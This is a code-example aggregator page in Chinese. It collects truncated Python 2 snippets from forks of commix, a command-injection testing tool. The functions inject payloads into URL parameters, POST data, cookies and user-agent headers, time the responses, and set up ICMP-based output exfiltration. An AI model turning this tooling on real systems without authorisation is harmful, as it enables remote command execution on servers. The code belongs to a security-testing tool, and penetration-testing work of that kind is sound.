• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号

Python headers.do_check函数代码示例

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

本文整理汇总了Python中src.core.requests.headers.do_check函数的典型用法代码示例。如果您正苦于以下问题:Python do_check函数的具体用法?Python do_check怎么用?Python do_check使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。



在下文中一共展示了do_check函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。

示例1: injection

def injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell):

    if alter_shell:
        # Classic decision payload (check if host is vulnerable).
        payload = cb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
    else:
        # Classic decision payload (check if host is vulnerable).
        payload = cb_payloads.cmd_execution(separator, TAG, cmd)

    if separator == " ":
        payload = re.sub(" ", "%20", payload)
    else:
        payload = re.sub(" ", whitespace, payload)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
        sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
        response = user_agent_injection_test(url, vuln_parameter, payload)

    else:
        # Check if defined method is GET (Default).
        if http_request_method == "GET":
            # Check if its not specified the 'INJECT_HERE' tag
            url = parameters.do_GET_check(url)

            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = "".join(vuln_parameter)
            request = urllib2.Request(target)

            # Check if defined extra headers.
            headers.do_check(request)

            # Check if defined any HTTP Proxy.
            if menu.options.proxy:
                try:
                    response = proxy.use_proxy(request)
                except urllib2.HTTPError, err:
                    print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
                    raise SystemExit()

            # Check if defined Tor.
            elif menu.options.tor:
                try:
                    response = tor.use_tor(request)
                except urllib2.HTTPError, err:
                    print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
                    raise SystemExit()

            else:
开发者ID:MajorD4m4ge,项目名称:commix,代码行数:60,代码来源:cb_injector.py


示例2: warning_detection

def warning_detection(url, http_request_method):
  try:
    # Find the host part
    url_part = url.split("=")[0]
    request = urllib2.Request(url_part)
    # Check if defined extra headers.
    headers.do_check(request)
    response = requests.get_request_response(request)
    if response:
      response = urllib2.urlopen(request)
      html_data = response.read()
      err_msg = ""
      if "eval()'d code" in html_data:
        err_msg = "'eval()'"
      if "Cannot execute a blank command in" in html_data:
        err_msg = "execution of a blank command,"
      if "sh: command substitution:" in html_data:
        err_msg = "command substitution"
      if "Warning: usort()" in html_data:
        err_msg = "'usort()'"
      if re.findall(r"=/(.*)/&", url):
        if "Warning: preg_replace():" in html_data:
          err_msg = "'preg_replace()'"
        url = url.replace("/&","/e&")
      if "Warning: assert():" in html_data:
        err_msg = "'assert()'"
      if "Failure evaluating code:" in html_data:
        err_msg = "code evaluation"
      if err_msg != "":
        warn_msg = "A failure message on " + err_msg + " was detected on page's response."
        print settings.print_warning_msg(warn_msg)
    return url
  except urllib2.HTTPError, err_msg:
    print settings.print_critical_msg(err_msg)
    raise SystemExit()
开发者ID:Cyber-Forensic,项目名称:commix,代码行数:35,代码来源:eb_injector.py


示例3: injection_test

def injection_test(payload, http_request_method, url):
                      
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    # Check if its not specified the 'INJECT_HERE' tag
    #url = parameters.do_GET_check(url)
    
    # Encoding spaces.
    payload = payload.replace(" ","%20")
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    try:
      # Get the response of the request
      response = get_request_response(request)
    except KeyboardInterrupt:
      response = None

  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)

    # Define the POST data  
    if settings.IS_JSON == False:
      data = re.sub(settings.INJECT_TAG, payload, parameter)
      request = urllib2.Request(url, data)
    else:
      payload = payload.replace("\"", "\\\"")
      data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
      try:
        data = json.loads(data, strict = False)
      except:
        pass
      request = urllib2.Request(url, json.dumps(data))

    # Check if defined extra headers.
    headers.do_check(request)

    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
    
    try:
      # Get the response of the request
      response = get_request_response(request)
    except KeyboardInterrupt:
      response = None

  return response, vuln_parameter
开发者ID:jamesshew,项目名称:commix,代码行数:60,代码来源:fb_injector.py


示例4: authentication_process

def authentication_process():

  auth_url = menu.options.auth_url
  auth_data = menu.options.auth_data
  cj = cookielib.CookieJar()
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  request = opener.open(urllib2.Request(auth_url))

  cookies = ""
  for cookie in cj:
      cookie_values = cookie.name + "=" + cookie.value + "; "
      cookies += cookie_values

  if len(cookies) != 0 :
    menu.options.cookie = cookies.rstrip()
    if settings.VERBOSITY_LEVEL >= 1:
      success_msg = "The received cookie is "  
      success_msg += menu.options.cookie + Style.RESET_ALL + "."
      print settings.print_success_msg(success_msg)

  urllib2.install_opener(opener)
  request = urllib2.Request(auth_url, auth_data)
  # Check if defined extra headers.
  headers.do_check(request)
  # Get the response of the request.
  response = requests.get_request_response(request)
  return response
开发者ID:BMaChina,项目名称:commix,代码行数:27,代码来源:authentication.py


示例5: inject_cookie

  def inject_cookie(url, vuln_parameter, payload, proxy):
    if proxy == None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)

    if settings.TIME_RELATIVE_ATTACK :
      payload = urllib.quote(payload)

    # Check if defined POST data
    if menu.options.data:
      menu.options.data = settings.USER_DEFINED_POST_DATA
      request = urllib2.Request(url, menu.options.data)
    else:
      url = parameters.get_url_part(url)
      request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    payload = checks.newline_fixation(payload)
    request.add_header('Cookie', menu.options.cookie.replace(settings.INJECT_TAG, payload))
    try:
      headers.check_http_traffic(request)
      response = opener.open(request)
      return response
    except ValueError:
      pass
开发者ID:security-geeks,项目名称:commix,代码行数:26,代码来源:requests.py


示例6: injection_test

def injection_test(payload, http_request_method, url):
                      
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    # Check if its not specified the 'INJECT_HERE' tag
    #url = parameters.do_GET_check(url)
    
    # Encoding spaces.
    payload = payload.replace(" ","%20")
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)

    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      try:
        response = proxy.use_proxy(request)
      except urllib2.HTTPError, err:
        print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
        raise SystemExit() 
      except KeyboardInterrupt:
        response = None
开发者ID:Mechkov,项目名称:commix,代码行数:29,代码来源:fb_injector.py


示例7: injection_results

def injection_results(url, OUTPUT_TEXTFILE, delay):
  
  # Find the correct directory.
  path = url
  path_parts = path.split('/')
  count = 0
  for part in path_parts:        
    count = count + 1
  count = count - 1
  last_param = path_parts[count]
  output = url.replace(last_param, OUTPUT_TEXTFILE)
  time.sleep(delay)

  # Check if defined extra headers.
  request = urllib2.Request(output)
  headers.do_check(request)
  
  # Evaluate test results.
  output = urllib2.urlopen(request)
  html_data = output.read()
  shell = re.findall(r"(.*)", html_data)
  
  return shell

#eof
开发者ID:evilrovot,项目名称:commix,代码行数:25,代码来源:fb_injector.py


示例8: do_check

def do_check(url):
  check_proxy = True
  try:
    if settings.VERBOSITY_LEVEL >= 1:
      info_msg = "Setting the HTTP proxy for all HTTP requests... "
      print settings.print_info_msg(info_msg) 
    # Check if defined POST data
    if menu.options.data:
      request = urllib2.Request(url, menu.options.data)
    else:
       request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    request.set_proxy(menu.options.proxy,settings.PROXY_SCHEME)
    try:
      check = urllib2.urlopen(request)
    except urllib2.HTTPError, error:
      check = error
  except:
    check_proxy = False
    pass
  if check_proxy == True:
    pass
  else:
    err_msg = "Unable to connect to the target URL or proxy ("
    err_msg += menu.options.proxy
    err_msg += ")."
    print settings.print_critical_msg(err_msg)
    raise SystemExit()
开发者ID:security-geeks,项目名称:commix,代码行数:29,代码来源:proxy.py


示例9: icmp_exfiltration_handler

def icmp_exfiltration_handler(url, http_request_method):
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print "\n" + Back.RED + "(x) Error:  You need to have root privileges to run this option." + Style.RESET_ALL
    os._exit(0)

  if http_request_method == "GET":
    url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
      os._exit(0)
开发者ID:R3NW4,项目名称:commix,代码行数:27,代码来源:icmp_exfiltration.py


示例10: injection_test

def injection_test(payload, http_request_method, url):
                      
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    # Encoding non-ASCII characters payload.
    payload = urllib.quote(payload)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)

    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      try:
        response = proxy.use_proxy(request)
      except urllib2.HTTPError, err:
        print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
        raise SystemExit() 

    # Check if defined Tor.
    elif menu.options.tor:
      try:
        response = tor.use_tor(request)
      except urllib2.HTTPError, err:
        print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
        raise SystemExit() 
开发者ID:evilrovot,项目名称:commix,代码行数:35,代码来源:fb_injector.py


示例11: do_check

def do_check(url):
  check_proxy = True
  info_msg = "Testing proxy " + menu.options.proxy + "... "
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()
  try:
    # Check if defined POST data
    if menu.options.data:
      request = urllib2.Request(url, menu.options.data)
    else:
       request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    request.set_proxy(menu.options.proxy,settings.PROXY_PROTOCOL)
    try:
      check = urllib2.urlopen(request)
    except urllib2.HTTPError, error:
      check = error
  except:
    check_proxy = False
    pass
  if check_proxy == True:
    sys.stdout.write("[" + Fore.GREEN + "  SUCCEED " + Style.RESET_ALL + " ]\n")
    sys.stdout.flush()

    # Check if defined "--force-ssl" option AND "--proxy" option.
    # We then force the proxy to https
    if menu.options.force_ssl and menu.options.proxy:
      settings.PROXY_PROTOCOL = 'https'
  else:
    print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]"
    err_msg = "Could not connect to proxy."
    print settings.print_error_msg(err_msg)
    sys.exit(0)
开发者ID:HugoDelval,项目名称:commix,代码行数:34,代码来源:proxy.py


示例12: icmp_exfiltration_handler

def icmp_exfiltration_handler(url, http_request_method):
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print "\n" + Back.RED + settings.ERROR_SIGN + "You need to have root privileges to run this option." + Style.RESET_ALL
    os._exit(0)

  if http_request_method == "GET":
    #url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          os._exit(0)
开发者ID:hanshaze,项目名称:commix,代码行数:32,代码来源:icmp_exfiltration.py


示例13: warning_detection

def warning_detection(url, http_request_method):
  try:
    # Find the host part
    url_part = url.split("=")[0]
    request = urllib2.Request(url_part)
    # Check if defined extra headers.
    headers.do_check(request)
    response = urllib2.urlopen(request)
    html_data = response.read()
    error_msg = ""
    if "eval()'d code" in html_data:
      error_msg = "'eval()'"
    if "Cannot execute a blank command in" in html_data:
      error_msg = "execution of a blank command,"
    if "sh: command substitution:" in html_data:
      error_msg = "command substitution"
    if "Warning: usort()" in html_data:
      error_msg = "'usort()'"
    if re.findall(r"=/(.*)/&", url):
      if "Warning: preg_replace():" in html_data:
        error_msg = "'preg_replace()'"
      url = url.replace("/&","/e&")
    if "Warning: assert():" in html_data:
      error_msg = "'assert()'"
    if "Failure evaluating code:" in html_data:
      error_msg = "code evaluation"
    if error_msg != "":
      print Fore.YELLOW + settings.WARNING_SIGN + "A failure message on " + error_msg + " was detected on page's response." + Style.RESET_ALL
    return url
  except urllib2.HTTPError, err:
    print Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
    raise SystemExit()
开发者ID:jbrahy,项目名称:commix,代码行数:32,代码来源:eb_injector.py


示例14: icmp_exfiltration_handler

def icmp_exfiltration_handler(url,http_request_method):
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print colors.BGRED + "\n(x) Error:  You need to have root privileges to run this option.\n" + colors.RESET
    sys.exit(0)

  if http_request_method == "GET":
    url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
      opener = urllib2.build_opener(proxy)
      urllib2.install_opener(opener)
      response = urllib2.urlopen(request)
    except urllib2.HTTPError, err:
      print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
      sys.exit(1) 
开发者ID:moscaliucpaulandrei,项目名称:commix,代码行数:30,代码来源:ICMP_Exfiltration.py


示例15: injection_test

def injection_test(payload,http_request_method,url):
  		    
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    # Encoding non-ASCII characters payload.
    payload = urllib.quote(payload)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)

    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      try:
	proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	opener = urllib2.build_opener(proxy)
	urllib2.install_opener(opener)
	response = urllib2.urlopen(request)
	
      except urllib2.HTTPError, err:
	print "\n(x) Error : " + str(err)
	sys.exit(1) 

    else:
      response = urllib2.urlopen(request)
      # Just to be sure
      response.read()
开发者ID:MiauWuffMiau,项目名称:commix,代码行数:35,代码来源:fb_injector.py


示例16: do_check

def do_check(url):
  check_proxy = True
  sys.stdout.write(settings.INFO_SIGN + "Testing proxy " + menu.options.proxy + "... ")
  sys.stdout.flush()
  try:
    # Check if defined POST data
    if menu.options.data:
      request = urllib2.Request(url, menu.options.data)
    else:
       request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    request.set_proxy(menu.options.proxy,settings.PROXY_PROTOCOL)
    try:
      check = urllib2.urlopen(request)
    except urllib2.HTTPError, error:
      check = error
  except:
    check_proxy = False
    pass
  if check_proxy == True:
    sys.stdout.write("[" + Fore.GREEN + "  SUCCEED " + Style.RESET_ALL + " ]\n")
    sys.stdout.flush()
  else:
    print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]"
    print Back.RED + settings.ERROR_SIGN + "Could not connect to proxy." + Style.RESET_ALL
    sys.exit(0)
开发者ID:0day29,项目名称:commix,代码行数:27,代码来源:proxy.py


示例17: do_check

def do_check(url):

  check_proxy = True
  sys.stdout.write("(*) Testing proxy "+menu.options.proxy+" ... ")
  sys.stdout.flush()
  try:
    request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    request.set_proxy(menu.options.proxy,"http")
    try:
      check = urllib2.urlopen(request)
      
    except urllib2.HTTPError, error:
      check = error
      
  except:
    check_proxy = False
    pass
  
  if check_proxy == True:
    sys.stdout.write("["+colors.GREEN+" OK "+colors.RESET+"]\n")
    sys.stdout.flush()
    
  else:
    print "[" + colors.BGRED+ " FAILED "+colors.RESET+"]\n"
    sys.exit(1)
    
开发者ID:CodeGuardian,项目名称:commix,代码行数:27,代码来源:proxy.py


示例18: injection

def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):
  if menu.options.file_write or menu.options.file_upload :
    minlen = 0
  else:
    minlen = 1
    
  print "\n(*) Retrieving the length of execution output..."
  for j in range(int(minlen),int(maxlen)):
    
    # Execute shell commands on vulnerable host.
    if not alter_shell :
      payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
    else:
      payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
      sys.stdout.write("\n" + colors.GREY + payload.replace("\n","\\n") + colors.RESET)
      
    start = 0
    end = 0
    start = time.time()
    
    # Check if defined method is GET (Default).
    if http_request_method == "GET":
      payload = urllib.quote(payload)
      
      # Check if its not specified the 'INJECT_HERE' tag
      url = parameters.do_GET_check(url)
      
      target = re.sub(settings.INJECT_TAG, payload, url)
      vuln_parameter = ''.join(vuln_parameter)
      
      #print target
      request = urllib2.Request(target)
  
      # Check if defined extra headers.
      headers.do_check(request)
		      
      # Check if defined any HTTP Proxy.
      if menu.options.proxy:
	try:
	  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	  opener = urllib2.build_opener(proxy)
	  urllib2.install_opener(opener)
	  response = urllib2.urlopen(request)
	  response.read()
	except urllib2.HTTPError, err:
	  print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	  sys.exit(1) 
  
      else:
	try:
	  response = urllib2.urlopen(request)
	  response.read()
	except urllib2.HTTPError, err:
	  print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	  sys.exit(1) 
开发者ID:TheNameIsNigel,项目名称:commix,代码行数:58,代码来源:tfb_injector.py


示例19: injection

def injection(separator,TAG,cmd,prefix,suffix,whitespace,http_request_method,url,vuln_parameter):
  
  # Execute shell commands on vulnerable host.
  payload = cb_payloads.cmd_execution(separator,TAG,cmd)
  
  if separator == " " :
    payload = re.sub(" ", "%20", payload)
  else:
    payload = re.sub(" ", whitespace, payload)

  # Check if defined "--prefix" option.
  if menu.options.prefix:
    prefix = menu.options.prefix
    payload = prefix + payload
  else:
    payload = prefix + payload
    
  # Check if defined "--suffix" option.
  if menu.options.suffix:
    suffix = menu.options.suffix
    payload = payload + suffix
  else:
    payload = payload + suffix
      
  # Check if defined "--verbose" option.
  if menu.options.verbose:
    sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
    
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    vuln_parameter = ''.join(vuln_parameter)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)	
      
    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      try:
	proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	opener = urllib2.build_opener(proxy)
	urllib2.install_opener(opener)
	response = urllib2.urlopen(request)
      except urllib2.HTTPError, err:
	print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	sys.exit(1) 

    else:
      try:
	response = urllib2.urlopen(request)
	
      except urllib2.HTTPError, err:
	print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	sys.exit(1) 
开发者ID:LZ-SecurityTeam,项目名称:commix,代码行数:58,代码来源:cb_injector.py


示例20: injection_test

def injection_test(payload, http_request_method, url):
  start = 0
  end = 0
  start = time.time()
  
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    # Check if its not specified the 'INJECT_HERE' tag
    #url = parameters.do_GET_check(url)
    
    # Encoding non-ASCII characters payload.
    payload = urllib.quote(payload)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
      
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Get the response of the request
    response = get_request_response(request)

  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
    
    # Define the POST data   
    if settings.IS_JSON == False:
      data = re.sub(settings.INJECT_TAG, payload, parameter)
      request = urllib2.Request(url, data)
    else:
      payload = payload.replace("\"", "\\\"")
      data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
      data = json.loads(data, strict = False)
      request = urllib2.Request(url, json.dumps(data))
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Get the response of the request
    response = get_request_response(request)

  end  = time.time()
  how_long = int(end - start)

  return how_long, vuln_parameter
开发者ID:jack51706,项目名称:commix,代码行数:57,代码来源:tfb_injector.py



注:本文中的src.core.requests.headers.do_check函数示例由纯净天空整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。


鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
Python parameters.do_GET_check函数代码示例发布时间:2022-05-27
下一篇:
Python tfb_injector.injection函数代码示例发布时间:2022-05-27
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap